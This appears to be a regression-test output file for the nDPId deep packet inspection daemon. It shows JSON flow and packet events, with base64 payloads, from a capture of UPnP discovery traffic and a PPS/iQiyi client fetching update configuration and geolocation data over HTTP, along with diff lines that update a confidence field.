01084{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1397,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1467353189909,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":525,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":525,"pkt_l4_len":491,"thread_ts_msec":1467353189909,"pkt":"AQBef\/\/6cBiLE+IdCABFAAH\/I6cAAAER3n7AqAUm7\/\/\/+gdsB2wB6x3GTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVNlcnZlcjoxDQpOVFM6c3NkcDphbGl2ZQ0KTG9jYXRpb246aHR0cDovLzE5Mi4xNjguNS4zODoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpVU046dXVpZDoyZjY4OGVjZS1jMGIxLTQxMDQtYjllNS1jYmNlZTUwM2U2YjQ6OnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVNlcnZlcjoxDQpDYWNoZS1Db250cm9sOm1heC1hZ2U9OTAwDQpTZXJ2ZXI6TWljcm9zb2Z0LVdpbmRvd3MvNi4yIFVQblAvMS4wIFVQblAtRGV2aWNlLUhvc3QvMS4wDQpPUFQ6Imh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7IG5zPTAxDQowMS1OTFM6MDAyODViYzNjM2JhMjA3MDA3ZTFjM2I3NjIxYzg0NzYNCg0K"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1467353190040,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1467353190040,"pkt":"TF4M6gNlABxCjnAxCABFAADGLkBAAIAGTxPAqHMI3xpqE8VLAFDaxGl\/7FKS9VAYQTcFigAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkaGVscGVyLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZEhlbHBlcl9ydW54eA0KSG9zdDogc3RhdGljLnFpeWkuY29tDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQo="} -00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloadhelper.ini","code":0,"content_type":"","user_agent":"DownloadHelper_runxx"}} +00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloadhelper.ini","code":0,"content_type":"","user_agent":"DownloadHelper_runxx"}} 01802{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1467353190044,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1063,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1063,"pkt_l4_len":1029,"thread_ts_msec":1467353190044,"pkt":"ABxCjnAxTF4M6gNlCABFAAQZtrxAADgGC0TfGmoTwKhzCABQxUvsUpL12sRqHVAYAB9YnAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoyOSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogNjY3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjE3OjMwIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW0NvbnRyb2xdDQpjb3VudD02DQpjMD1DaGVja0NsaWVudA0KYzE9UVlBZ2VudA0KYzI9bWFzZmxhZw0KYzM9bWFzYXV0bw0KYzQ9bWFzYmxvZw0KYzU9Q29va2llQ2xlYXINCltEb3dubG9hZGVyXQ0KQ2hlY2tDbGllbnQ9aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9DaGVja0NsaWVudC56aXA7U3RhcnQ7OTdEQzFBMTJCQzMyMkNERjRCQjE5MjNDNEVGMTRFMUINClFZQWdlbnQ9aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9RWUFnZW50LnppcDtTdGFydEFnZW50OzRDRDQxOTkyNjI5ODBBRjY5RDA3OThEREFBNDJGM0M5DQptYXNmbGFnPWh0dHA6Ly9tYmRhcHAuaXFpeWkuY29tL2ovb3QvbWFzZmxhZy56aXA7U3RhcnQ7RTNGRDlCMjEzMEFCQTIxNTc1QjRGNDk2RDg5Q0FGOTINCm1hc2F1dG89aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9tYXNhdXRvLnppcDtTdGFydDtEMTQ3M0E5Mjg2MjBENjZGMzM0QjI4RUYxRjk0QjA3OA0KbWFzYmxvZz1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L21hc2Jsb2cuemlwO1N0YXJ0O0JGRENCNTM1QzNFRUIwMkZEREI5NjFEMDVBNTIzQjI2DQpDb29raWVDbGVhcj1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L0Nvb2tpZUNsZWFyLnppcDtTdGFydDtGMzlBRDlFOTgzREJCMzA5MkYxQzNDNDIwRjJBNDgyQQ=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190110,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1467353190110,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190110,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kJVAADMGqbHKbA7bwKhzCABQxUpzStvEq5YvP1AYADaqqAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190110,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190110,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190168,"flow_last_seen":1467353190168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190168,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1467353190168,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190168,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FPRAADMGJVPKbA7bwKhzCABQxHdtLPipvNGQx1AYAMQhYwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190168,"flow_last_seen":1467353190168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190168,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190168,"flow_last_seen":1467353190168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190168,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1405,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1467353190178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353190178,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAlEAAAERAT3AqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1467353190235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190235,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FPVAADMGJVLKbA7bwKhzCABQxHdtLPk6vNGSM1AYANYfVAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1467353190634,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353190634,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LnBAAIAGTvHAqHMI3xpqE8VMAFCjClS\/APxWfFAYQTf8ogAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL1FZQWdlbnQuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IFFZQWdlbnRfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/QYAgent.ini","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/QYAgent.ini","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} 00940{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1467353190638,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":420,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":420,"pkt_l4_len":386,"thread_ts_msec":1467353190638,"pkt":"ABxCjnAxTF4M6gNlCABFAAGWcOxAADgGU5ffGmoTwKhzCABQxUwA\/FZ8owpVT1AYAB8JQAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMjUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkV4cGlyZXM6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MzA6MDcgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KWC1DYWNoZTogSElUIGZyb20gMTAuMTIxLjMzLjk3DQpYLUNhY2hlOiBISVQgZnJvbSAyMjMuMjYuMTA2LjE5DQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQpbUVlBZ2VudF0NCnY9MA0KcD0xMDANCmU9"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7580000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1467353190892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1467353190892,"pkt":"TF4M6gNlABxCjnAxCABFAACVLoRAAIAGUpzAqHMIaibba8VNAFAdei0\/k1iI9FAYQTd0xwAAR0VUIC9jaXR5anNvbiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVlBZ2VudF9ydW54eA0KSG9zdDogaXBsb2NhdGlvbi5nZW8ucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7580000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"iplocation.geo.qiyi.com","url":"iplocation.geo.qiyi.com\/cityjson","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7580000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"iplocation.geo.qiyi.com","url":"iplocation.geo.qiyi.com\/cityjson","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} 01043{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1467353190978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":497,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":497,"pkt_l4_len":463,"thread_ts_msec":1467353190978,"pkt":"ABxCjnAxTF4M6gNlCABFAAHjK+5AADIGoeRqJttrwKhzCABQxU2TWIj0HXotrFAYAOXEmAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eQ0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMCBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LVR5cGU6IGNoYXJzZXQ9dXRmLTgNCg0KZjINCnZhciByZXR1cm5JcENpdHkgPXsiY29kZSI6IkEwMDAwMCIsICJkYXRhIjogeyJpcCI6IjExOC4xNjMuOC45MCIsICJpc3AiOiLkuK3ljY7nlLXkv6EiLCAiY291bnRyeSI6IuS4reWbveWkp+mZhiIsICJwcm92aW5jZSI6IuWPsOa5viIsICJjaXR5IjoiTm9uZSIsICJpc3BfaWQiOjY5LCAiY291bnRyeV9pZCI6NDgsICJwcm92aW5jZV9pZCI6MjI4LCAiY2l0eV9pZCI6MjI4MDAwLCAibG9jYXRpb25faWQiOjY5MjI4MDAwfX0KDQo="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1467353190978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":25,"thread_ts_msec":1467353190978,"pkt":"ABxCjnAxTF4M6gNlCABFAAAtK+9AADIGo5lqJttrwKhzCABQxU2TWIqvHXotrFAYAOXCuQAAMA0KDQoA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1467353191500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191500,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9BAAIAGTZDAqHMI3xpqFMZOAFCUEYDiYZCIJlAYQTcJ9QAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2ZsYWcuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2ZsYWdfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masflag.ini","code":0,"content_type":"","user_agent":"masflag_runxx"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masflag.ini","code":0,"content_type":"","user_agent":"masflag_runxx"}} 